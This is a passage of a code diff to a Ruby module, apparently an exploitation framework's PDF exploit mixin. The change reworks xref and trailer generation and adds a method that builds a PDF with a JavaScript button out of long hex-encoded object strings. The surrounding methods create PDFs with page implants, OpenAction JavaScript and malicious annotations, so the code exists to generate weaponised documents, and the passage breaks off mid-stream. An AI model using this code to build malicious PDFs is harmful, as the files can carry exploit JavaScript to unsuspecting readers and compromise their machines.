eol hdr end def add_object(num, data) - @xref << @pdf.length + @xref[num] = @pdf.length @pdf << ioDef(num) @pdf << data @pdf << endobj @@ -174,18 +174,25 @@ module Exploit::PDF end def xref_table + id = @xref.keys.max+1 ret = "xref" << eol - ret << "0 %d" % (@xref.length + 1) << eol + ret << "0 %d" % id << eol ret << "0000000000 65535 f" << eol - @xref.each do |index| - ret << "%010d 00000 n" % index << eol - end + ret << (1..@xref.keys.max).map do |index| + if @xref.has_key?(index) + offset = @xref[index] + "%010d 00000 n" % offset << eol + else + "0000000000 00000 f" << eol + end + end.join + ret end - def trailer(root_obj) - ret = "trailer" << nObfu("<</Size %d/Root " % (@xref.length + 1)) << ioRef(root_obj) << ">>" << eol - ret + def trailer(root_obj, space='') + id = @xref.keys.max+1 + "trailer" << space << "<</Size %d/Root " % id << ioRef(root_obj) << ">>" << eol end def startxref @@ -196,7 +203,7 @@ module Exploit::PDF end def eol - "\x0d\x0a" + @eol || "\x0d\x0a" end def endobj @@ -267,7 +274,7 @@ module Exploit::PDF #Create PDF with Page implant ## def pdf_with_page_exploit(js,strFilter) - @xref = [] + @xref = {} @pdf = '' @pdf << header @@ -290,7 +297,7 @@ module Exploit::PDF # you try to merge the exploit PDF with an innocuous one ## def pdf_with_openaction_js(js,strFilter) - @xref = [] + @xref = {} @pdf = '' @pdf << header @@ -313,7 +320,7 @@ module Exploit::PDF #Create PDF with a malicious annotation ## def pdf_with_annot_js(js,strFilter) - @xref = [] + @xref = {} @pdf = '' @pdf << header @@ -332,5 +339,62 @@ module Exploit::PDF finish_pdf end + + ## + #Create PDF with a button onclick + ## + def pdf_with_button_js(js) + @xref = {} + @pdf = header('1.6') + + add_object(25, "\xd\x3c\x3c\x2f\x41\x63\x72\x6f\x46\x6f\x72\x6d\x20\x34\x30\x20\x30\x20\x52\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x20\x33\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x73\x20\x33\x32\x20\x30\x20\x52\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20\x37\x20\x30\x20\x52\x2f\x50\x61\x67\x65\x73\x20\x31\x36\x20\x30\x20\x52\x2f\x53\x70\x69\x64\x65\x72\x49\x6e\x66\x6f\x20\x32\x32\x20\x30\x20\x52\x2f\x53\x74\x72\x75\x63\x74\x54\x72\x65\x65\x52\x6f\x6f\x74\x20\x31\x30\x20\x30\x20\x52\x2f\x54\x79\x70\x65\x2f\x43\x61\x74\x61\x6c\x6f\x67\x3e\x3e\xd") + add_object(40, "\xd\x3c\x3c\x2f\x44\x41\x28\x2f\x48\x65\x6c\x76\x20\x30\x20\x54\x66\x20\x30\x20\x67\x20\x29\x2f\x44\x52\x3c\x3c\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3c\x3c\x2f\x50\x44\x46\x44\x6f\x63\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x3e\x3e\x2f\x46\x6f\x6e\x74\x3c\x3c\x2f\x48\x65\x42\x6f\x20\x33\x39\x20\x30\x20\x52\x2f\x48\x65\x6c\x76\x20\x34\x37\x20\x30\x20\x52\x2f\x5a\x61\x44\x62\x20\x34\x38\x20\x30\x20\x52\x3e\x3e\x3e\x3e\x2f\x46\x69\x65\x6c\x64\x73\x5b\x33\x38\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(3, "\xd\x3c\x3c\x2f\x4c\x65\x6e\x67\x74\x68\x20\x33\x33\x31\x33\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x58\x4d\x4c\x2f\x54\x79\x70\x65\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x3c\x3f\x78\x70\x61\x63\x6b\x65\x74\x20\x62\x65\x67\x69\x6e\x3d\x22\xef\xbb\xbf\x22\x20\x69\x64\x3d\x22\x57\x35\x4d\x30\x4d\x70\x43\x65\x68\x69\x48\x7a\x72\x65\x53\x7a\x4e\x54\x63\x7a\x6b\x63\x39\x64\x22\x3f\x3e\xd\x3c\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x3d\x22\x61\x64\x6f\x62\x65\x3a\x6e\x73\x3a\x6d\x65\x74\x61\x2f\x22\x20\x78\x3a\x78\x6d\x70\x74\x6b\x3d\x22\x41\x64\x6f\x62\x65\x20\x58\x4d\x50\x20\x43\x6f\x72\x65\x20\x35\x2e\x34\x2d\x63\x30\x30\x35\x20\x37\x38\x2e\x31\x34\x37\x33\x32\x36\x2c\x20\x32\x30\x31\x32\x2f\x30\x38\x2f\x32\x33\x2d\x31\x33\x3a\x30\x33\x3a\x30\x33\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3e\xd\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\x2e\x31\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x4d\x4d\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x6d\x6d\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x70\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x70\x64\x66\x2f\x31\x2e\x33\x2f\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x33\x2d\x33\x31\x54\x31\x33\x3a\x33\x35\x3a\x35\x31\x2b\x30\x32\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x70\x64\x66\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x6c\x69\x20\x78\x6d\x6c\x3a\x6c\x61\x6e\x67\x3d\x22\x78\x2d\x64\x65\x66\x61\x75\x6c\x74\x22\x3e\x6a\x73\x2e\x74\x78\x74\x3c\x2f\x72\x64\x66\x3a\x6c\x69\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x4d\x4d\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x49\x44\x3e\x75\x75\x69\x64\x3a\x39\x64\x38\x35\x36\x39\x65\x65\x2d\x37\x66\x64\x38\x2d\x34\x34\x62\x61\x2d\x39\x63\x38\x63\x2d\x36\x65\x35\x32\x32\x35\x33\x35\x39\x62\x61\x35\x3c\x2f\x78\x6d\x70\x4d\x4d\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x49\x44\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x4d\x4d\x3a\x49\x6e\x73\x74\x61\x6e\x63\x65\x49\x44\x3e\x75\x75\x69\x64\x3a\x34\x63\x37\x30\x34\x36\x62\x34\x2d\x30\x34\x39\x33\x2d\x39\x30\x34\x62\x2d\x61\x35\x35\x32\x2d\x64\x63\x31\x37\x38\x32\x63\x62\x33\x62\x62\x31\x3c\x2f\x78\x6d\x70\x4d\x4d\x3a\x49\x6e\x73\x74\x61\x6e\x63\x65\x49\x44\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x70\x64\x66\x3a\x50\x72\x6f\x64\x75\x63\x65\x72\x3e\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x3c\x2f\x70\x64\x66\x3a\x50\x72\x6f\x64\x75\x63\x65\x72\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\xd\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\xd\x3c\x2f\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x3c\x3f\x78\x70\x61\x63\x6b\x65\x74\x20\x65\x6e\x64\x3d\x22\x77\x22\x3f\x3e\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + add_object(32, "\xd\x3c\x3c\x2f\x49\x44\x53\x20\x31\x37\x20\x30\x20\x52\x2f\x55\x52\x4c\x53\x20\x31\x38\x20\x30\x20\x52\x3e\x3e\xd") + add_object(7, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x32\x2f\x46\x69\x72\x73\x74\x20\x38\x20\x30\x20\x52\x2f\x4c\x61\x73\x74\x20\x38\x20\x30\x20\x52\x2f\x54\x79\x70\x65\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x3e\x3e\xd") + add_object(16, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x31\x2f\x4b\x69\x64\x73\x5b\x32\x36\x20\x30\x20\x52\x5d\x2f\x54\x79\x70\x65\x2f\x50\x61\x67\x65\x73\x3e\x3e\xd") + add_object(22, "\xd\x3c\x3c\x2f\x56\x20\x31\x2e\x32\x35\x3e\x3e\xd") + add_object(10, "\xd\x3c\x3c\x2f\x43\x6c\x61\x73\x73\x4d\x61\x70\x20\x31\x31\x20\x30\x20\x52\x2f\x4b\x20\x31\x32\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x54\x72\x65\x65\x20\x31\x33\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x54\x72\x65\x65\x4e\x65\x78\x74\x4b\x65\x79\x20\x31\x2f\x54\x79\x70\x65\x2f\x53\x74\x72\x75\x63\x74\x54\x72\x65\x65\x52\x6f\x6f\x74\x3e\x3e\xd") + add_object(11, "\xd\x3c\x3c\x2f\x53\x70\x64\x72\x41\x72\x74\x3c\x3c\x2f\x4f\x2f\x57\x65\x62\x43\x61\x70\x74\x75\x72\x65\x3e\x3e\x3e\x3e\xd") + add_object(12, "\xd\x3c\x3c\x2f\x4b\x20\x31\x35\x20\x30\x20\x52\x2f\x50\x20\x31\x30\x20\x30\x20\x52\x2f\x53\x2f\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3e\x3e\xd") + add_object(13, "\xd\x3c\x3c\x2f\x4e\x75\x6d\x73\x5b\x30\x20\x31\x34\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(14, "\xd\x5b\x31\x35\x20\x30\x20\x52\x20\x31\x35\x20\x30\x20\x52\x5d\xd") + add_object(15, "\xd\x3c\x3c\x2f\x43\x2f\x53\x70\x64\x72\x41\x72\x74\x2f\x4b\x5b\x30\x20\x31\x5d\x2f\x50\x20\x31\x32\x20\x30\x20\x52\x2f\x50\x67\x20\x32\x36\x20\x30\x20\x52\x2f\x53\x2f\x41\x72\x74\x69\x63\x6c\x65\x3e\x3e\xd") + add_object(26, "\xd\x3c\x3c\x2f\x41\x6e\x6e\x6f\x74\x73\x20\x34\x31\x20\x30\x20\x52\x2f\x43\x6f\x6e\x74\x65\x6e\x74\x73\x20\x35\x34\x20\x30\x20\x52\x2f\x43\x72\x6f\x70\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x32\x2e\x30\x20\x37\x39\x32\x2e\x30\x5d\x2f\x47\x72\x6f\x75\x70\x20\x33\x34\x20\x30\x20\x52\x2f\x49\x44\x20\x33\x35\x20\x30\x20\x52\x2f\x4d\x65\x64\x69\x61\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x32\x2e\x30\x20\x37\x39\x32\x2e\x30\x5d\x2f\x50\x5a\x20\x31\x2e\x30\x2f\x50\x61\x72\x65\x6e\x74\x20\x31\x36\x20\x30\x20\x52\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x3c\x3c\x2f\x43\x6f\x6c\x6f\x72\x53\x70\x61\x63\x65\x3c\x3c\x2f\x43\x53\x30\x20\x33\x33\x20\x30\x20\x52\x3e\x3e\x3e\x3e\x2f\x52\x6f\x74\x61\x74\x65\x20\x30\x2f\x53\x74\x72\x75\x63\x74\x50\x61\x72\x65\x6e\x74\x73\x20\x30\x2f\x54\x79\x70\x65\x2f\x50\x61\x67\x65\x3e\x3e\xd") + add_object(41, "\xd\x5b\x33\x38\x20\x30\x20\x52\x5d\xd") + add_object(54, "\xd\x3c\x3c\x2f\x46\x69\x6c\x74\x65\x72\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x2f\x4c\x65\x6e\x67\x74\x68\x20\x31\x35\x34\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x5c\x4e\xc1\xd\xc2\x30\x14\xbb\xf7\x2b\xf2\x5\xbe\x56\xad\x63\x30\x6\xeb\xa6\xe0\x61\x20\xcc\xdb\xf0\x50\x6b\xa7\x3\x5d\x65\x7b\x82\xfe\xbd\x9b\xb7\x79\x48\x42\x12\x8\xa1\xac\xe7\xb6\xb1\x8e\x91\x24\x94\x31\x5b\x77\xf3\x17\xd4\x64\x2\x73\x78\xe0\x44\xc6\x84\x37\x6a\xd\xd\x25\x47\xac\xc7\xa8\x7a\x9d\xf9\xf3\xf4\xa0\x5d\x8\xec\x7b\xd0\xf1\xe7\xe\xf6\xda\x76\x96\xdb\xd0\x21\x4d\x4d\x91\x43\x6c\xcb\x91\x28\xaf\x24\xdc\x0\x5\xc\xae\x13\x4a\x62\xb5\x81\x8e\xd5\x22\xd2\x88\x96\xf1\x24\xbd\x17\x8d\xa0\xe9\x89\xbb\xfb\xe9\x48\x99\xef\xb\xc8\xf9\xcc\x7f\xad\x66\xf5\x57\x80\x1\x0\xcb\xa4\x36\x2c\xd\x65\x